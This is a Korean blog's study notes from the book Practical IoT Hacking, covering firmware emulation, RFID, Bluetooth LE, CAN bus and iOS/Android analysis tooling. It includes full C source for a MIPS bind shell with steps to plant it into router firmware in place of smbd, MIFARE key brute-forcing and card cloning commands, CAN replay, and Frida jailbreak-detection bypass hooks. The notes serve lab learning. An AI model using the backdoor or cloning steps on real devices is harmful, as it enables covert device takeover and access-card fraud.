수정중입니다..
Practical IoT hacking Book 의 내용을 공부하며 정리중임을 밝혀둡니다..
Binary Analysis
Ghidra
# jdk 11+ needed
sudo apt install openjdk-11-jdk
sudo apt install openjdk-11-jre-headless
wget https://github.com/NationalSecurityAgency/ghidra/releases/download/Ghidra_10.0.2_build/ghidra_10.0.2_PUBLIC_20210804.zip
unzip ghidra_10.0.2_PUBLIC_20210804.zip
cd ghidra_10.0.2_PUBLIC
./ghidraRun
Oketeta
sudo apt install snapd
sudo snapd install okteta
okteta
Network Analysis
burpsuite
https://portswigger.net/burp/communitydownload
chmod +x burpsuite_community_linux_v<your version here>.sh
./burpsuite_community_linux_v<your version here>.sh
browser setup, getting started
https://medium.com/swlh/getting-started-with-burp-suite-on-ubuntu-3c1e665122a3
Firmware Binary Emulation
A binary -> QEMU
Complete firmware -> FIRMADYNE
QEMU
sudo apt install qemu qemu-user qemu-user-static qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils
# emulate a MIPS big endian execuatbles
$ qemu-mips -L ./squashfs-root/ ./squashfs-root/bin/zcat
# Booting the kernel image ( arm / versatile-pb ) with QEMU w/o filesystem on MELP2 book
$ QEMU_AUDIO_DRV=none qemu-system-arm -m 256M -nographic -M versatilepb -kernel arch/arm/boot/zImage -append "console=ttyAMA0,115200" -dtb versatile-pb.dtb
# Booting kernel, the initramfs with QEMU
$ QEMU_AUDIO_DRV=none qemu-system-arm -m 256M -nographic -M versatilepb -kernel arch/arm/boot/zImage -append "console=ttyAMA0 rdinit=/bin/sh" -dtb arch/arm/boot/dts/versatile-pb.dtb -initrd ../initramfs.cpio.gz
FIRMADYNE
sudo apt install busybox-static fakeroot git dmsetup kpartx netcat-openbsd nmappython-psycopg2python3-psycopg2 snmp uml-utilities util-linux vlan
# download
git clone --recursive https://github.com/firmadyne/firmadyne.git
sudo ./setup.sh
sudo ./download.sh
# extractor
sudo -H pip install git+https://github.com/ahupp/python-magic
sudo -H pip install git+https://github.com/sviehb/jefferson
#database
sudo apt-get install postgresql
sudo -u postgres createuser -P firmadyne (with password firmadyne)
sudo -u postgres createdb -O firmadyne firmware
sudo -u postgres psql -d firmware < ./database/schema
# edit firmadyne.config / path to repository
# extract the firmware to images from the compressed file
$ python3 ./sources/extractor/extractor.py -b Netgear -sql 127.0.0.1 -np -nk "D6000_V1.0.0.41_1.0.1_FW.zip"
optional arguments:
-h, --help show this help message and exit
-sql SQL Hostname of SQL server
-nf Disable extraction of root filesystem (may decrease extraction time)
-nk Disable extraction of kernel (may decrease extraction time)
-np Disable parallel operation (may increase extraction time)
-b BRAND Brand of the firmware image
# identify the firmware's architecture and store in the FIRMADYNE DB
$ ./scripts/getArch.sh ./images/1.tar.gz
# store information in the DB from the extracted image and generate a QEMU image
$ ./scripts/tar2db.py -i 1 -f ./images/1.tar.gz
$ sudo ./scripts/makeImage.sh 1
# network
$ ./scripts/inferNetwork.sh 1
# begin the emulation
$ ./scratch/1/run.sh
Backdooring Firmware
OpenWrt toolchain ( firmware complier for SoC routers based on MIPS processors )
sudo apt install binutils bzip2 diff find flex gawk gcc-6+ getopt grep install libc-dev libz-dev make4.1+ perl python3.6+ rsync subversion unzip which
git clone https://github.com/openwrt/openwrt
cd openwrt
./scripts/feeds update -a
./scripts/feeds install -a
menuconfig
make toolchain/install
$ export STAGING_DIR="~/pih"
$ ./openwrt/staging_dir/toolchain-mips_24kc_gcc-8.4.0_musl/bin/mips-openwrt-linux-gcc bindshell.c -o bindshell -static -EB -march=24kc
# bindshell modified Osana Maliths code used in Practical IoT Hacking Book
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define SERVER_PORT 9999
/* CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
* Bind Shell using Fork for my TP-Link mr3020 router running busybox
* Arch : MIPS
* mips-linux-gnu-gcc mybindshell.c -o mybindshell -static -EB -march=24kc
*/
int main() {
int serverfd, clientfd, server_pid, i = 0;
char *banner = "[~] Welcome to @OsandaMalith's Bind Shell\n";
char *args[] = { "/bin/busybox", "sh", (char *) 0 };
struct sockaddr_in server, client;
socklen_t len;
int x = fork();
if (x == 0) {
server.sin_family = AF_INET;
server.sin_port = htons(SERVER_PORT);
server.sin_addr.s_addr = INADDR_ANY;
serverfd = socket(AF_INET, SOCK_STREAM, 0);
bind(serverfd, (struct sockaddr *)&server, sizeof(server));
listen(serverfd, 1);
while (1) {
len = sizeof(struct sockaddr);
clientfd = accept(serverfd, (struct sockaddr *)&client, &len);
server_pid = fork();
if (server_pid) {
write(clientfd, banner, strlen(banner));
for(; i <3 /*u*/; i++) dup2(clientfd, i);
execve("/bin/busybox", args, (char *) 0);
close(clientfd);
} close(clientfd);
}
}
return 0;
}$ python3 -m http.server 8080
$ wget http://192.168.1.2:8080/bindshell # on router emulation
$ nc 192.168.1.1 9999 # host
Firmware-Mod-Kit
sudo apt install git build-essential zlib1g-dev liblzma-dev python-magic bsdmainutil
git clone https://github.com/rampageX/firmware-mod-kit
cd firmware-mod-kit
# extract
./extract-firmware.sh ../d6000/D6000-V1.0.0.41_1.0.1.bin
# modify
sudo cp ../bindshell fmk/rootfs/bin/smbd
# rebuild
./build-firmware.sh -min
RFID
Proxmark3
# ubuntu for libqt4-dev
# sudo add-apt-repository ppa:rock-core/qt4 && sudo apt update
sudo apt install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libstdc++-arm-none-eabi-newlib libpcsclite-dev pcscd
git clone https://github.com/Proxmark/proxmark3.git
make clean && make all
# update bootloader / OS, FPGA image
./client/flasher /dev/ttyACM0 -b ./bootrom/obj/bootrom.elf
./client/flasher /dev/ttyACM0 armsrc/obj/fullimage.elf
# start
./client/proxmark3 /dev/ttyACM0
# SEARCH
proxmark3> hf search
proxmark3> lf search
# MIFARE classic 1k brand ( hf mf ... )
# BRUTE-FORCE MIFARE all block, 1k with def keys and transfer to default keys / or dump to dumpedkeys.bin
proxmark3> hf mf chk *1 t ./client/default_keys.dic
proxmark3> hf mf chk *1 d ./client/default_keys.dic
# READ 0th block with A key ( 0 sector )
proxmark> hf mf rdbl 0 A FFFFFFFFFFFF
# READ complete sector
proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF
# DUMP MIFARE 1k to dumpdata.bin with keys in dumpedkeys.bin
proxmark3> hf mf dump 1
# RESTORE to a new card with dumpdata.bin
proxmark3> hf mf restore
# RAW Command for non-brand card
hf 14a raw ...
-p pwer
-b bits
-c with CRC
MIFARE SPEC
26 #REQA
93 20 #Anti-collision
93 70 # SELECT card uid
60 Autenticate with pw
#example for classic 1k raw command
proxmark3> hf 14a raw -p -b 7 26
received 2 bytes: 04 00
proxmark3> hf 14a raw -p 93 20
received 5 bytes: 02 0E 88 30 B4
proxmark3> hf 14a raw -p -c 93 70 02 0E 88 30 B4
received 3 bytes: 08 B6 DD
proxmark3> hf 14a raw -p -c 60 00
received 4 bytes: 0E F8 CC 3E proxmark3>
Bluetooth hacking : BLE
swiss army knife -> Gatttool, hcitool
GATT monitor, simple write > bettercap
sniffer > Ubertooth One / Android
about GATT Server..
https://www.youtube.com/watch?v=eHqtiCMe4NA
Hcitool
$ sudo hcitool lescan
GATTTool
$ hciconfig -a
$ gatttool --help-all
# read command
$ gatttool -b MAC --char-read -a char_handle
# write command
$ gatttool -b MAC --char-write-req -a char_handle -n new_value
#interactive mode CONNECT with random MAC_ADDR
$ sudo gatttool -b B4:99:4C:64:85:12 -I -t random
gatttool -I
[][LE] > connect B4:99:4C:64:85:12
[B4:99:4C:64:85:12][LE]> help
[B4:99:4C:64:85:12][LE]> primary
[B4:99:4C:64:85:12][LE]> characteristics
[B4:99:4C:64:85:12][LE]> char-read-hnd <handle>
[B4:99:4C:64:85:12][LE]> char-read-uuid <UUID>
[B4:99:4C:64:85:12][LE]> char-write-req <handle> <new value>
TROUBLE SHOOT
# hcitool I/O Error
sudo service bluetooth restart
# BLE Connect error
sudo hciconfig hci0 reset
Wireshark
sudo add-apt-repository universe
sudo apt update
sudo apt install wireshark
# to capture vcan0 packets
# after install, select <Yes> for non-superusers ( or sudo dpkg-reconfigure wireshark-common )
sudo usermod -a userid -G wireshark
# Wireshark 2.2+ 이후부터는 BLE 관련 plugin 빌드는 무시해도된다.
In wireshark SETUP
# https://blog.dork94.com/34?category=735144
1. BLE DLT_USER
# 하지않으면 "LE LL" ADV 패킷만 보이고 ATT 패킷을 확인 할 수 없다.
Edit -> Preferences
Under Protocols select DLT_USER and Click Edit
Click [+], enter
btle
in "Payload Protocol", and click OK
Wireshark FILTER expression 알아두기
# https://wiki.wireshark.org/Bluetooth
1. ATT Packets filter
btatt or
btl2cap.cid==0x0004
# PCAP read
$ wireshark -r bledump.pcap
# pipe read
Capture options 톱니바퀴 아이콘 > Manage interfaces 버튼 >
Pipes Tab > [+] > /tmp/pipe 입력, OK
capture interfaces 창에서 START.
이후 Ubertooth 실행.
Ubertooth One + Wireshark
# 2018-12-R1 old version
# sudo apt install uberthooth 하면 되지만 libbtbb 와 같이 최신을 설치하자.
# lastest 2020-12-R1
# build, install > https://github.com/greatscottgadgets/ubertooth/wiki/Build-Guide
sudo apt install cmake libusb-1.0-0-dev make gcc g++ libbluetooth-dev wget \ pkg-config python3-numpy python3-qtpy python3-distutils python3-setuptools
wget https://github.com/greatscottgadgets/libbtbb/archive/2020-12-R1.tar.gz -O libbtbb-2020-12-R1.tar.gz
tar -xf libbtbb-2020-12-R1.tar.gz
cd libbtbb-2020-12-R1
mkdir build
cd build
cmake ..
make
sudo make install
sudo ldconfig
wget https://github.com/greatscottgadgets/ubertooth/releases/download/2020-12-R1/ubertooth-2020-12-R1.tar.xz tar -xf ubertooth-2020-12-R1.tar.xz
cd ubertooth-2020-12-R1/host
mkdir build
cd build
cmake ..
make
sudo make install
sudo ldconfig
# Wireshark 2.2+ 이후부터는 plugin 빌드는 무시해도된다.
# update firmware > https://github.com/greatscottgadgets/ubertooth/wiki/Firmware
# live packet capture, following connections, set connection following target
$ ubertooth-btle -f -tB4:99:4C:64:85:12
# log to pcap
$ ubertooth-btle -f -tB4:99:4C:64:85:12 -c bledump.pcap
$ wireshark -r bledump.pcap
# create a pipe to perform an active traffic interception
$ mkfifo /tmp/pipe
$ wireshark & # capture interfaces - INPUT > /tmp/pipe, START
$ ubertooth-btle -f -tB4:99:4C:64:85:12 -c /tmp/pipe
TROUBLE SHOOTING
WIreshark 설정을 했음에도 LE LL 프로토콜, ADV 패킷만 보이고 ATT 패킷이없다.
1. 최신업데이트
bluetooth packet 을 decode 하기위해서는 libbtbb 이 필요하다.
나의 경우에는 Firmware 2020 + apt install ubertooth (2018버전) 에서 문제 생겨
최신버전과 libbtbb 를 모두 같이 빌드설치후 해결되었다.
2. -A 37,38,39 채널변경
3. 안테나 문제
Android Phone Developer Modes + Wireshark
따로 스니퍼 하드웨어를 가지고있지 않아도 안드로이드 폰의 개발자기능을 패킷스니퍼로 사용할 수 있다.
안드로이드폰의 개발자 모드를 활성화후 Bluetooth HCI snoop log 를 활성화 하면
모든 블루투스 패킷이 캡쳐되며 개발자 모드의 세팅된 버퍼의 크기내에서 log 기록이 남겨지고
USB debugging 을 활성화하여 log 를 pc로 추출하여 Wireshark 로 읽어들일 수 있다.
이때 log 파일이 저장되는 경로가 폰마다 다르기때문에 직접 확인보아야하는데,
접근가능한 파일시스템내에 있다면 다음명령어로 확인 가능 할 수 있다.
$ adb shell cat /etc/bluetooth/bt_stack.conf
# BtSnoop log output file
BtSnoopFileName =/sdcard/btsnoop_hci.log <--your file location
/sdcard/btsnoop_hci.log
/sdcard/oem_log/btsnoop/btsnoop_hci.log
/data/misc/bluetooth/logs/btsnoop_hci.log
보통의 위의 경우에 존재하지만 여러 경우가 있을 수 있고 경로에 접근 가능한경우
$ adb root ( /data 접근의 경우 루팅이 필요하다.)
$ adb pull <path> 로 가져오면된다. ($ adb pull /data/misc/bluetooth/logs/btsnoop_hci.log)
루팅하지않은경우의 방법
나는 redmi 10 note 를 사용하였는데 bt_stack.conf 에 경로설정은 없었고 루팅 후 /data/misc/bluetooth/logs/btsnoop_hci.log 파일을 얻을 수 있었으나, 루팅하지않아 접근 불가능한경우 직접 파일을 노출하는것이아니라
버그리포트를 다운로드하여 로그를 제공한다.
$ adb shell dumpsys bluetooth_manager ( BT log dump 개발자모드에서 체크한경우는 안해도되는듯하다. )
$ adb bugreport anewbugreportfolder
anewbugreportfolder.zip 가 다운로드 되고, 내 redmi 10 note 의 경우에는
운좋게 압축파일안의 FS/data/misc/bluetooth/logs 안에서 btsnoop_hci.log 를 발견할 수 있었다!
운이 안좋은 경우면.. 다음처럼 btsnooz.py 를 구하여 압축파일 내의 txt 에서 추출하여야한다.
btsnooz.py BUG_REPORT.txt > BTSNOOP.log
# 참고
https://stackoverflow.com/questions/28445552/bluetooth-hci-snoop-log-not-generated
https://source.android.com/devices/bluetooth/verifying_debugging#debugging-with-bug-reports
$ wireshark -r btsnoop_hci.log
이후 wireshark 로 ATT 를 확인하기위해 btatt 필터 적용하여 WRITE Command 를 확인 할 수 있었고,
제일 마지막 3바이트가 전구의 RGB 색상을 의미함을 알 수 있었다.
Bettercap
install docker
sudo apt install docker.io
sudo addgroup link9 docker
sudo reboot
install bettercap
sudo apt install libusb-1.0-0
sudo docker pull bettercap/bettercap
sudo docker run -it --privileged --net=host bettercap/bettercap -h
# run enabling BLE module and start capturing
sudo docker run -it --privileged --net=host bettercap/bettercap --eval "ble.recon on"
$ ble.show
$ ble.num <mac addr>
$ ble.write MAC UUID HEX_DATA
$ ble.write b4:99:4c:64:85:12 2a06 58010301FF00CE5F00 # change RGB colorificbulb
btmon
$ sudo btmon
BLE CTP Infinity
Installation
https://link9.tistory.com/entry/BLE-CTF-Infinity-setup-guide-LinuxVSCode
Bettercap 으로 별도로 풀이를 해보았다.
https://link9.tistory.com/entry/BLE-CTF-Infinity-%ED%92%80%EC%9D%B4-with-Bettercap
BLE CTF Infinity 풀이 with Bettercap
https://github.com/hackgnar/ble_ctf GitHub - hackgnar/ble_ctf: A Bluetooth low energy capture the flag A Bluetooth low energy capture the flag. Contribute to hackgnar/ble_ctf development by creating..
link9.tistory.com
Spooftooph
빌드 오류 해결을 위해 중간에 makefile 을 변경해주야한다.
# makefile 의 빌드명령에서 라이브러리를 뒤로 (-o 앞) 으로 옮겨준다.
https://askubuntu.com/questions/940328/how-to-install-spooftooph-on-ubuntu-16-04
apt install libcurses-dev libbluetooth-dev
git clone https://gitlab.com/kalilinux/packages/spooftooph.git
nano makefile
make
sudo make install
$ spooftooph -i hci0 -a 11:22:33:44:55:66
bleSuite / ble-Replay
sudo apt install python2-dev # for gevent
sudo pip2 install -r requirements.txt
sudo python setup.py install
# re-install scapy in https://github.com/secdev/scapy/
git clone https://github.com/secdev/scapy.git
cd scapy
sudo python setup.py install
cd docs
make html
cd ..
# sudo blesuite scan
설치되었으나 정상적으로 동작하지않음.
다른 동글로 다시 시도해 볼예정.
ImportError: No module named Crypto.Cipher
pycrypto 의 문제인데 requirements 를 설치할때 sudo 를 붙여주거나
easy_install 로 해결.
Car Hacking : CAN
CAN via OBD-II Hardware : USB2CAN + Macchina M2 / or CL1000
Communication for CAN packets : SocketCAN, can-utils
Virtual CAN interface : vcan
OBD-II Simulator : ICSim
Wireshark
Replay Attack > candump+canplayer or SavvyCAN
ICSim
Instrument Cluster Simulator
# https://github.com/zombieCraig/ICSim
sudo apt install libsdl2-dev libsdl2-image-dev
sudo apt install can-utils
git clone https://github.com/zombieCraig/ICSim
cd ICSim
make
./setup_vcan.sh
ifconfig vcan0
# Running the dashboard
./icsim vcan0
./controls vcan0
vcan
Setting virtual CAN interface / setup_vacn.sh
# load kernel module
sudo modprobe can
sudo modprobe vcan
lsmod | grep can
# set up virtual interface
sudo ip link add dev vcan0 type vcan
sudo ip link set up vcan0
# verify
ifconfig vcan0
can-utils
# cansniffer cansend candump canplayer cangen
# cangen
$ cangen vcan0
$ wireshark & # select vcan0
# candump
$ candump -a vcan0 # live dump with ascii
$ candump -l vcan0 # log candump-<date>.log to replay attack
# cansniffer - all ID monitor to see change in bytes in CAN
cansniffer -c vcan0
filtering arbitration ID
-000000
+000000
+ID
b # binary mode
# canplayer
$ canplayer -I canfile.log # replay attack
# cansend
$ cansend interface frame
# dividing and narrowing packets to find Aribitration ID
$ wc -l candump.log
split -l <count> candump.log frame_
SavvyCAN
Without qtserialbus ( and ICSim ), Just Real car, you can download easy use prebuild version.
wget https://github.com/collin80/SavvyCAN/releases/download/V199.1/SavvyCAN-305dafd-x86_64.AppImage
chmod 744 SavvyCAN-305dafd-x86_64.AppImage
./SavvyCAN-305dafd-x86_64.AppImage
To use with ICSim, install qt5, qtserialbus and build SavvyCAN
( 빌드 성공 버젼 = 5.14.2/5.12.9/1.0.245. qtserialbus 버젼이 같은기간의 5.12.9로 빌드하여 성공.
다른버전 또는 다른 qmake 사용시 빌드 실패 경험하였음. )
wget https://download.qt.io/archive/qt/5.14/5.14.2/qt-opensource-linux-x64-5.14.2.run
chmod a+x ./qt-opensource-linux-x64-5.14.2.run
sudo ./qt-opensource-linux-x64-5.14.2.run # full install
sudo apt install qtdeclarative5-dev qttools5-dev g++
git clone https://github.com/qt/qtserialbus
cd qtserialbus
git checkout 5.12.9
/opt/Qt5.14.2/5.14.2/gcc_64/bin/qmake
make
sudo make install
git clone https://github.com/collin80/SavvyCAN
cd SavvyCAN
/opt/Qt5.14.2/5.14.2/gcc_64/bin/qmake CONFIG+=debug
make
sudo make install
#Adding vcan0 to SocketCAN
Connection > Open Connection Window > Add New Device Connection
Select "QT SerialBus Devices"
SerialBus Device Type: socketcan
Port: vcan0
Create a new connection click
# find Arbitration ID
RE Tool > Sniffer
속도계를 변화시키며 ID 를 찾아낸다.
# Sending Custom frames
Send Frame > custom
bus:0 ID: 0x244 Len 5 > data 1 2 3 4 5> Trigger: 30ms Modification d3=d3+1
# 0x244 의 데이터중 30ms 마다 3번째 바이트가 1씩 증가된다. ICSim 으로 확인 할 수있다.
# fuzzing
https://www.youtube.com/watch?v=Q-tP3PpPYVM
USB2CAN 8devices
It works with Linux distributions like Ubuntu and Debian with no additional driver installation.
If the driver is correctly loaded, CAN interface should be seen when issuing the command sudo ip link.
Set can0 interface speed to 125 Kbps:
sudo ip link set can0 up type can bitrate 125000 sample-point 0.875
Set to can0 to “steady” state (INFO led):
sudo ip link set can0 up
To bring down interface (STAT led):
sudo ip link set can0 down
To get more information about configuration options type:
sudo ip link set can0 type can help
resources
Car Hacking 101: Practical Guide to Exploiting CAN-Bus using Instrument Cluster Simulator — Part I…
Automotive security is really exciting and is an interesting topic of study for many security researchers. Automotive and hardware, for…
medium.com
Analyzing Android
InsecureBankv2
# python2, pip v2 needed for AndroLab
git clone https://github.com/dineshshetty/Android-InsecureBankv2.git
cd Android-InsecureBankv2
adb install -s InsecureBankv2.apk
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
sudo python get-pip.py
cd AndroLabServer
pip install -r requirements.txt # or you can easy_install
$ python app.py
ADB
adb start-server
adb kill-server
adb shell
adb install -s app.apk
adb push <file> <path>
adb pull <file>
$ adb bugreport bugreport_new
$ adb pull /data/misc/bluetooth/logs/btsnoop_hci.log
# Extracing an APK
$ adb shell pm list packages | grep insecure
$ adb shell pm path com.android.insecurebankv2
Analyzing iOS
ipainstaller
cydia 에서 설치하고 .IPA 의 설치와 추출도 가능하다. (-b option)
Filza 등에서 앱내부 iTunesMetadata.plist > softwareVersionBundleId 문자열을 확인한다.
ipainstall 로 추출하고 윈도우의 3utools 나 리눅스의 scp 를 통하여 PC로 복사한다.
# Extracting .IPA
$ ipainstaller -b <bundle id string>
Containers
OS app or JB app PATH:/Aplications
Bundle Container PATH: /var/containers/Bundle/Application/
Data Container PATH: /var/mobile/Containers/Data/Application/
iCould Container PATH:/private/var/mobile/Library/Mobile Documents/
iOS Keychain PATH:/var/Keychains/keychain-2.db # use DB Browser on win
root user PATH:/var/root
BundleID:
- Bundle Container 의 Info.plist 에 CFBundleIdentifier 를 확인.
- FRIDA 에서 확인. frida -Ua
App Screenshot (Background): [Bundle Container]/Library/Caches/Snapshots (Deprecated)
otool
# Fairplay DRM 적용여부 / 바이너리 load commands 의 cryptid ==1 or 0
$ otool -l <Mach-O> | grep -A4 LC_ENCRYPTION_INFO
# check Mach header of ASLR
$ otool -Vh DVIA-v2
root# otool -Vh DVIA-v2
DVIA-v2:
Mach header
magic cputype cpusubtype caps filetype ncmds sizeofcmds flags
MH_MAGIC_64 ARM64 ALL 0x00 EXECUTE 65 7112 NOUNDEFS DYLDLINK TWOLEVEL WEAK_DEFINES BINDS_TO_WEAK PIE
frida-ios-dump
DVIA-v2 - Damn Vulnerable iOS
root# wget https://github.com/prateek147/DVIA-v2/raw/master/DVIA-v2-swift.ipa
use Filza or 3uTools (win) to install
iGoat
plistutil
$ plistutil -i <binary plist>
Keychain Dumper
# on iOS
# "git describe --tags" -> 1.1.0
git clone https://github.com/ptoomey3/Keychain-Dumper # without binary
cd Keychain-Dumper
wget https://github.com/ptoomey3/Keychain-Dumper/releases/download/1.1.0/keychain_dumper-1.1.0.zip
unzip keychain_dumper-1.1.0.zip # compiled binary
chmod +x setup_on_iOS.sh
./setup_on_iOS.sh # print /bin/usr/keychain_dumper not found. / its OK
apt install sqlite3 -y
chmod +x updateEntitlements.sh
./updateEntitlements.sh
keychain_dumper
# 아이폰에 잠금비번을 걸어준다.
# extract keychain data on DVIA2
# keychain_dumper | grep -A8 -B2 <bundle ID ex. com.highaltitudehacks.DVIAswiftv2>
FRIDA
# FRIDA server on iOS cydia
# Add build.frida.re, install Frida
pip3 install frida-tools
frida --version
frida-ps -U
# list processes on iOS
$ frida-ps -U
# running ps
$ frida-ps -Ua
# interactive mode on USB iOS
$ frida -U DVIA-v2
# evaluation CODE example
$ frida -U -e "console.log('Hello World!')" DVIA-v2
$ frida -U -e "console.log(ObjC.classes['JailbreakDetection'].\$ownMethods)" DVIA-v2
$ frida -U -e "Interceptor.attach(ObjC.classes['JailbreakDetection']['isJailbroken'].implementation, { onLeave: function(retval) { retval = ptr('0x0'); console.log('Return value : ' + retval) }});" DVIA-v2
# load .JS scripts to iOS on USB
# DVIA-v2 example / Jailbreak Test1 code
# Hook a func using Imagebase offset / change w0 register
var realBase = Module.findBaseAddress('DVIA-v2');
console.log(realBase);
var jb_address = realBase.add('0x1cbdd0');
console.log(jb_address);
Interceptor.attach(jb_address, {
onEnter: function(args) {
this.context.x0 = 0x0;
console.log(JSON.stringify(this.context));
}
})$ frida -U -l jb_test.js DIVA-v2
# examples
# ObjC examples
# enum classes
if (ObjC.available) {
for(var classname in ObjC.classes)
console.log(classname)
}
# enum methods
if (ObjC.available) {
var classname = "JailbreakDetection"
var methods = ObjC.classes[classname].$ownMethods
console.log(methods)
}
# hook ObjC func
if (ObjC.available) {
var classname = "JailbreakDetection"
var methodname = "isJailbroken"
Interceptor.attach(ObjC.classes[classname][methodname].implementation, {
onLeave: function(retval) {
retval.replace(ptr('0x0'));
console.log('Return value : ' + retval);
}
});
}
# also look AppMon, Needle, droser(Android)
# https://github.com/interference-security/frida-scripts
Needle
Burpsuite
--> See network analysis
Fridump3 / memory dump, string dump
git clone https://github.com/Nightbringer21/fridump.git
cat README.md
pip install frida
python fridump.py -h
$ python fridump.py -U -r -s DVIA-v2
frida-ios-dump / DRM decrypted IPA dump
# 64bit linux needed
git clone https://github.com/AloneMonkey/frida-ios-dump.git
sudo pip3 install -r requirements.txt --upgrade
sudo apt install libusbmuxd-tools
iproxy 2222 22
python3 dump.py -l # list identifier
# dump google map to IPA
python3 dump.py com.apple.Maps
unable to launch iOS app: The operation couldn’t be completed. Application info provider (FBSApplicationLibrary) returned nil for ""
--> use pip3, python3
'Practice Notes > IoT Hardware Hacking Concept' 카테고리의 다른 글
| STM32보드 On-Chip-Debugging 인증우회 실습 (With OpenOCD) (0) | 2021.07.24 |
|---|---|
| 라우터 UART Pin 확인 실습 (0) | 2021.07.17 |